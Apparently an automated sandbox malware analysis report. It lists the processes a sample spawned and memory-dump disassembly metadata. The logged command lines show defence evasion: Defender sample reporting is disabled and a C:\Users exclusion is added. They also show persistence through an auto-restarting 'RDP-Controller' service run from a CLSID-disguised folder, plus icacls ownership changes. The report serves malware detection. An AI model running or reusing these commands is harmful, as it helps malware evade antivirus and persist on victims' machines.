                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:5
                                                    Start time:14:30:02
                                                    Start date:12/10/2024
                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend"
                                                    Imagebase:0x7ff6e3d50000
                                                    File size:452'608 bytes
                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:6
                                                    Start time:14:30:02
                                                    Start date:12/10/2024
                                                    Path:C:\Users\user\AppData\Local\Temp\f8ff311483bvmdq2bvv.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Users\user\AppData\Local\Temp\f8ff311483bvmdq2bvv.exe"
                                                    Imagebase:0x7ff66eba0000
                                                    File size:98'304 bytes
                                                    MD5 hash:319865D78CC8DF6270E27521B8182BFF
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Antivirus matches:
                                                    • Detection: 3%, ReversingLabs
                                                    Reputation:low
                                                    Has exited:true

                                                    Target ID:8
                                                    Start time:14:30:06
                                                    Start date:12/10/2024
                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:powershell.exe -NoLogo -Command "Set-MpPreference -MAPSReporting 0"
                                                    Imagebase:0x7ff6e3d50000
                                                    File size:452'608 bytes
                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:9
                                                    Start time:14:30:08
                                                    Start date:12/10/2024
                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath 'C:\Users\'"
                                                    Imagebase:0x7ff6e3d50000
                                                    File size:452'608 bytes
                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:11
                                                    Start time:14:30:14
                                                    Start date:12/10/2024
                                                    Path:C:\Users\user\AppData\Local\Temp\31yd7ynpdj6jw5vl4xn9qyj7u.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Users\user\AppData\Local\Temp\31yd7ynpdj6jw5vl4xn9qyj7u.exe"
                                                    Imagebase:0x7ff7a70c0000
                                                    File size:10'639'360 bytes
                                                    MD5 hash:7D1755E8E41A6C2F08D2FAEFFDF9DAD1
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Antivirus matches:
                                                    • Detection: 100%, Joe Sandbox ML
                                                    • Detection: 42%, ReversingLabs
                                                    Reputation:low
                                                    Has exited:true

                                                    Target ID:14
                                                    Start time:14:30:17
                                                    Start date:12/10/2024
                                                    Path:C:\Windows\System32\taskkill.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:taskkill.exe /F /FI "SERVICES eq RDP-Controller"
                                                    Imagebase:0x7ff6d59d0000
                                                    File size:101'376 bytes
                                                    MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:moderate
                                                    Has exited:true

                                                    Target ID:15
                                                    Start time:14:30:17
                                                    Start date:12/10/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff66e660000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:16
                                                    Start time:14:30:17
                                                    Start date:12/10/2024
                                                    Path:C:\Windows\System32\sc.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:sc.exe stop RDP-Controller
                                                    Imagebase:0x7ff712840000
                                                    File size:72'192 bytes
                                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:moderate
                                                    Has exited:true

                                                    Target ID:17
                                                    Start time:14:30:17
                                                    Start date:12/10/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff66e660000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:18
                                                    Start time:14:30:18
                                                    Start date:12/10/2024
                                                    Path:C:\Windows\System32\sc.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore
                                                    Imagebase:0x7ff712840000
                                                    File size:72'192 bytes
                                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:19
                                                    Start time:14:30:18
                                                    Start date:12/10/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff66e660000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:20
                                                    Start time:14:30:18
                                                    Start date:12/10/2024
                                                    Path:C:\Windows\System32\sc.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:sc.exe failure RDP-Controller reset= 1 actions= restart/10000
                                                    Imagebase:0x7ff712840000
                                                    File size:72'192 bytes
                                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:21
                                                    Start time:14:30:18
                                                    Start date:12/10/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff66e660000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:22
                                                    Start time:14:30:18
                                                    Start date:12/10/2024
                                                    Path:C:\Windows\System32\sc.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:sc.exe start RDP-Controller
                                                    Imagebase:0x7ff712840000
                                                    File size:72'192 bytes
                                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:23
                                                    Start time:14:30:18
                                                    Start date:12/10/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff66e660000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:24
                                                    Start time:14:30:18
                                                    Start date:12/10/2024
                                                    Path:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                    Imagebase:0x7ff70cad0000
                                                    File size:89'088 bytes
                                                    MD5 hash:4E320E2F46342D6D4657D2ADBF1F22D0
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Antivirus matches:
                                                    • Detection: 67%, ReversingLabs
                                                    Has exited:true

                                                    Target ID:25
                                                    Start time:14:30:18
                                                    Start date:12/10/2024
                                                    Path:C:\Windows\System32\icacls.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:icacls.exe C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\ /setowner *S-1-5-18
                                                    Imagebase:0x7ff768000000
                                                    File size:39'424 bytes
                                                    MD5 hash:48C87E3B3003A2413D6399EA77707F5D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:26
                                                    Start time:14:30:18
                                                    Start date:12/10/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff66e660000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:27
                                                    Start time:14:30:18
                                                    Start date:12/10/2024
                                                    Path:C:\Windows\System32\icacls.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:icacls.exe C:\Users\Public /restore C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\95cRhCj4pPDP.acl
                                                    Imagebase:0x7ff768000000
                                                    File size:39'424 bytes
                                                    MD5 hash:48C87E3B3003A2413D6399EA77707F5D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:28
                                                    Start time:14:30:18
                                                    Start date:12/10/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff66e660000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:30
                                                    Start time:14:30:43
                                                    Start date:12/10/2024
                                                    Path:C:\Windows\System32\svchost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                    Imagebase:0x7ff7403e0000
                                                    File size:55'320 bytes
                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                    Has elevated privileges:true
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Has exited:false

                                                    Target ID:31
                                                    Start time:14:31:10
                                                    Start date:12/10/2024
                                                    Path:C:\Windows\System32\svchost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                    Imagebase:0x7ff7403e0000
                                                    File size:55'320 bytes
                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:false

                                                    Target ID:32
                                                    Start time:14:31:10
                                                    Start date:12/10/2024
                                                    Path:C:\Windows\System32\WerFault.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\WerFault.exe -pss -s 452 -p 5252 -ip 5252
                                                    Imagebase:0x7ff66bfc0000
                                                    File size:570'736 bytes
                                                    MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:33
                                                    Start time:14:31:10
                                                    Start date:12/10/2024
                                                    Path:C:\Windows\System32\WerFault.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\WerFault.exe -u -p 5252 -s 1184
                                                    Imagebase:0x7ff66bfc0000
                                                    File size:570'736 bytes
                                                    MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:34
                                                    Start time:14:31:24
                                                    Start date:12/10/2024
                                                    Path:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                    Imagebase:0x7ff70cad0000
                                                    File size:89'088 bytes
                                                    MD5 hash:4E320E2F46342D6D4657D2ADBF1F22D0
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:35
                                                    Start time:14:31:47
                                                    Start date:12/10/2024
                                                    Path:C:\Windows\System32\WerFault.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\WerFault.exe -pss -s 520 -p 5164 -ip 5164
                                                    Imagebase:0x7ff66bfc0000
                                                    File size:570'736 bytes
                                                    MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:36
                                                    Start time:14:31:47
                                                    Start date:12/10/2024
                                                    Path:C:\Windows\System32\WerFault.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\WerFault.exe -u -p 5164 -s 1112
                                                    Imagebase:0x7ff66bfc0000
                                                    File size:570'736 bytes
                                                    MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Reset < >
                                                      APIs
                                                      • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 02B9A05F
                                                      • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 02B9A065
                                                      • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 02B9A06B
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2128977555.0000000002B90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2b90000_file.jbxd
                                                      Similarity
                                                      • API ID: _invalid_parameter_noinfo_noreturn
                                                      • String ID:
                                                      • API String ID: 3668304517-0
                                                      • Opcode ID: a3f64ff64f7b7f31477b65388417927e1dcf11656a0d7e8d81c602991d1e7496
                                                      • Instruction ID: c10bbc5163ba51729200dd879f8e6a6cdd68d67bfa4fff8a0e76901c47562742
                                                      • Opcode Fuzzy Hash: a3f64ff64f7b7f31477b65388417927e1dcf11656a0d7e8d81c602991d1e7496
                                                      • Instruction Fuzzy Hash: A9B17C70918E4C8FCB54EF28C884A9AB7E1FFA9304F50576AE88AD3265DB309481CB41
                                                      APIs
                                                      • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 02B9D0F7
                                                      • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 02B9D0FD
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2128977555.0000000002B90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2b90000_file.jbxd
                                                      Similarity
                                                      • API ID: _invalid_parameter_noinfo_noreturn
                                                      • String ID:
                                                      • API String ID: 3668304517-0
                                                      • Opcode ID: 34fbf8e30838d51e21bf191a2d090dd1966248fe052b2782dafca8ee0236092f
                                                      • Instruction ID: 43c51016baad8b8728b6a5a454ec9c9151c4fd7b9e1ccead1e181afca0f535f9
                                                      • Opcode Fuzzy Hash: 34fbf8e30838d51e21bf191a2d090dd1966248fe052b2782dafca8ee0236092f
                                                      • Instruction Fuzzy Hash: 8BA1A231928F4C8BDB54EF2CD8856EA77E2FB99350F10576AE88AC3154DB30D581CB81
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2128977555.0000000002B90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2b90000_file.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 647ee9b534975270aca972dac79fdea6b0120ab65a008a00e97fa6d470cd0a4c
                                                      • Instruction ID: 735053c5885d932743fd5f3816bbfea34b45d784af0717c341d0268c9a1e8d15
                                                      • Opcode Fuzzy Hash: 647ee9b534975270aca972dac79fdea6b0120ab65a008a00e97fa6d470cd0a4c
                                                      • Instruction Fuzzy Hash: 0EA1A331618E0C8FCF58EF2CD4856ADB7F2FFA9314B0046AAD44AD7255DA30E946CB85
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2128977555.0000000002B90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2b90000_file.jbxd
                                                      Similarity
                                                      • API ID: _clrfp
                                                      • String ID:
                                                      • API String ID: 3618594692-0
                                                      • Opcode ID: 9f5802e7a3bba20555b21e1936248732c444238cb055604f1a421cdc6350789e
                                                      • Instruction ID: 998e501469d19ab4c1ae4d2d320e50a5a39aeb87842ca0392bfa099b8e7a7f75
                                                      • Opcode Fuzzy Hash: 9f5802e7a3bba20555b21e1936248732c444238cb055604f1a421cdc6350789e
                                                      • Instruction Fuzzy Hash: 8AB16930614B4E8FDB99CF1CC89AB6677E0FF49308F188599E899CB661C335E852CB01
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2128977555.0000000002B90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2b90000_file.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: af3f5e58f1e42435f7da6adc6adac8f31d32a2d35e1c63632e3e7cc02981b94a
                                                      • Instruction ID: d1bff17bc3e8c6ed43cc613ab6befb6674f3d1ce8e744fa0d34d4bf1f3a44c56
                                                      • Opcode Fuzzy Hash: af3f5e58f1e42435f7da6adc6adac8f31d32a2d35e1c63632e3e7cc02981b94a
                                                      • Instruction Fuzzy Hash: 84E16431928B4C8BCB49DF68C8946BAB3E1FFA9300F50576EE486D3155EB74E644CB81
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2128977555.0000000002B90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2b90000_file.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 884b2154e67faba7e97d33cdef9cdf909460de4ff3516825797b00cb977ca7ac
                                                      • Instruction ID: 3e2354cca5a3e8d9562ad22d359fcdae41f3c7b614a20f7ed173775ddb636358
                                                      • Opcode Fuzzy Hash: 884b2154e67faba7e97d33cdef9cdf909460de4ff3516825797b00cb977ca7ac
                                                      • Instruction Fuzzy Hash: 6361F570A1CF5C4FDB28EF28985916EBBE5FB85710F14469FE886C3155DF70A8428AC2
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2128977555.0000000002B90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2b90000_file.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2fd267f5a20fc586d5f6155ebbd5ebefe49e40c3b4699dbf32c941d6f4a047b0
                                                      • Instruction ID: 1f9c43d445cb8492df69a90005cc8a0f65cb21ee0c01472946382032bfecd63c
                                                      • Opcode Fuzzy Hash: 2fd267f5a20fc586d5f6155ebbd5ebefe49e40c3b4699dbf32c941d6f4a047b0
                                                      • Instruction Fuzzy Hash: F551233271CE0C8F9B1CDE2CE49867573D2F7AC324315826EE40ED7265DA30E9468781
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2128977555.0000000002B90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2b90000_file.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b3bfdd2e48ad19d66b0e37b2c6738ec7b33e2acd157bee24fc1458e38cb5dc2f
                                                      • Instruction ID: 6729a28df03e5cd8237fb797bea448d2f693aa47e71d6067e110553b00606bf7
                                                      • Opcode Fuzzy Hash: b3bfdd2e48ad19d66b0e37b2c6738ec7b33e2acd157bee24fc1458e38cb5dc2f
                                                      • Instruction Fuzzy Hash: 5321C8317116054BE70CCE2EC899975B3D6F7D9205B54D27DE14BCB357CD3258038A08
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2128977555.0000000002B90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2b90000_file.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 818b3c2bf741691b3b4d97ce965452ef50dff5a67fbb0249e4fef83404bb3482
                                                      • Instruction ID: e1168f6ba9dfd52a8d0c6dd8589bd6800901c4e697313f84ea3a41aff8d5b0d9
                                                      • Opcode Fuzzy Hash: 818b3c2bf741691b3b4d97ce965452ef50dff5a67fbb0249e4fef83404bb3482
                                                      • Instruction Fuzzy Hash: 0C11A1723118048FDB5CDF3DC99966973D6EB89304B58C2BDE51ACB26AD6358903C744
                                                      APIs
                                                      • __FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 02BA0DCF
                                                        • Part of subcall function 02BA3132: __GetUnwindTryBlock.LIBCMT ref: 02BA3175
                                                        • Part of subcall function 02BA3132: __SetUnwindTryBlock.LIBVCRUNTIME ref: 02BA319A
                                                      • Is_bad_exception_allowed.LIBVCRUNTIME ref: 02BA0EA7
                                                      • __FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 02BA10F5
                                                      • std::bad_alloc::bad_alloc.LIBCMT ref: 02BA1202
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2128977555.0000000002B90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2b90000_file.jbxd
                                                      Similarity
                                                      • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                      • String ID: csm$csm$csm
                                                      • API String ID: 849930591-393685449
                                                      • Opcode ID: 3fb9d0c56a71d0f5861e67f07a09d0a106b159fdbf12d619d0216d77a39e9afb
                                                      • Instruction ID: fda78d837835fa698d31ce9d126c84079128838e13a6126ace0fc2940beba94e
                                                      • Opcode Fuzzy Hash: 3fb9d0c56a71d0f5861e67f07a09d0a106b159fdbf12d619d0216d77a39e9afb
                                                      • Instruction Fuzzy Hash: 5FE1E13092CB488FDB64EF6CC4957A9B7E1FB99314F50069ED889D7251DB30E881CB82
                                                      APIs
                                                      • Is_bad_exception_allowed.LIBVCRUNTIME ref: 02BA13E0
                                                      • std::bad_alloc::bad_alloc.LIBCMT ref: 02BA1709
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2128977555.0000000002B90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2b90000_file.jbxd
                                                      Similarity
                                                      • API ID: Is_bad_exception_allowedstd::bad_alloc::bad_alloc
                                                      • String ID: csm$csm$csm
                                                      • API String ID: 3523768491-393685449
                                                      • Opcode ID: 3c37fd6db8f1d7251cf834ba82edf3def457dd0e8a8ae703ba663f2cb829a33b
                                                      • Instruction ID: 14046405b1e90aeebe1ce8a1860d4169b7cc4e8b43290357a8f8b1ea94ec610f
                                                      • Opcode Fuzzy Hash: 3c37fd6db8f1d7251cf834ba82edf3def457dd0e8a8ae703ba663f2cb829a33b
                                                      • Instruction Fuzzy Hash: DBE1D23052CB488FDB54EF2CC4956AA77E1FB59314F1446AED48ACB612DB30E486CF82
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2128977555.0000000002B90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2b90000_file.jbxd
                                                      Similarity
                                                      • API ID: AdjustPointer
                                                      • String ID:
                                                      • API String ID: 1740715915-0
                                                      • Opcode ID: 9b1c0b3f231e4bcddaa8a570e8cd9ce20c2063c8fc35274121e91c7c1a746b78
                                                      • Instruction ID: 4a885687abaaa3a33441caf7e33b0a63ec440ff4f33efc88afdf7717bf305ace
                                                      • Opcode Fuzzy Hash: 9b1c0b3f231e4bcddaa8a570e8cd9ce20c2063c8fc35274121e91c7c1a746b78
                                                      • Instruction Fuzzy Hash: A5C1CF3051DE1A8F9B29BF1C8064375B2E1FB98714F584AADC48AC7255EB30E881CB85
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2128977555.0000000002B90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2b90000_file.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $($2$H$P!`$`
                                                      • API String ID: 0-2682688576
                                                      • Opcode ID: bc76d62830869bcd39272dfef10d6a3318e6b9030b160a7bcb89a7604e377882
                                                      • Instruction ID: 8586c5044f1aacd400091cbe900c4af0c88373ec64613b55f493d9dd5d844d48
                                                      • Opcode Fuzzy Hash: bc76d62830869bcd39272dfef10d6a3318e6b9030b160a7bcb89a7604e377882
                                                      • Instruction Fuzzy Hash: A8C1E6B09187988FD7A4DF18C08879ABBE0FB99314F504A6ED8CDCB215DB705589CF46
                                                      APIs
                                                      • _CallSETranslator.LIBVCRUNTIME ref: 02BA1A71
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2128977555.0000000002B90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2b90000_file.jbxd
                                                      Similarity
                                                      • API ID: CallTranslator
                                                      • String ID: MOC$RCC
                                                      • API String ID: 3163161869-2084237596
                                                      • Opcode ID: 7f7ab6c02d15fb7cada80a290f40bf769916c592d438a3060e1af43374edef25
                                                      • Instruction ID: 1a1b0625bab4df5a055cca187211f6c5a18edbe6ac775c262f74c786df30e57e
                                                      • Opcode Fuzzy Hash: 7f7ab6c02d15fb7cada80a290f40bf769916c592d438a3060e1af43374edef25
                                                      • Instruction Fuzzy Hash: CCA1C63092CB488FCB58EF6CC495AA9BBF1FB98314F14469EE44AC7111EB34E581CB81
                                                      APIs
                                                      • __except_validate_context_record.LIBVCRUNTIME ref: 02BA00A5
                                                      • _IsNonwritableInCurrentImage.LIBCMT ref: 02BA013C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2128977555.0000000002B90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2b90000_file.jbxd
                                                      Similarity
                                                      • API ID: CurrentImageNonwritable__except_validate_context_record
                                                      • String ID: csm
                                                      • API String ID: 3242871069-1018135373
                                                      • Opcode ID: 859e345823d80db8230311a4c986b9b96598fc69a601b47f6fead17499a59a6c
                                                      • Instruction ID: 53fc123febeac578d1632fbcec69fd8c90a36bc60fdf26bf36d50c5b997b39d3
                                                      • Opcode Fuzzy Hash: 859e345823d80db8230311a4c986b9b96598fc69a601b47f6fead17499a59a6c
                                                      • Instruction Fuzzy Hash: D561B23060CB088BDF28FE5CD4A5BB973D1FB54354F1049ADE88AC7256EB70E8918B85
                                                      APIs
                                                      • _CallSETranslator.LIBVCRUNTIME ref: 02BA17F1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2128977555.0000000002B90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2b90000_file.jbxd
                                                      Similarity
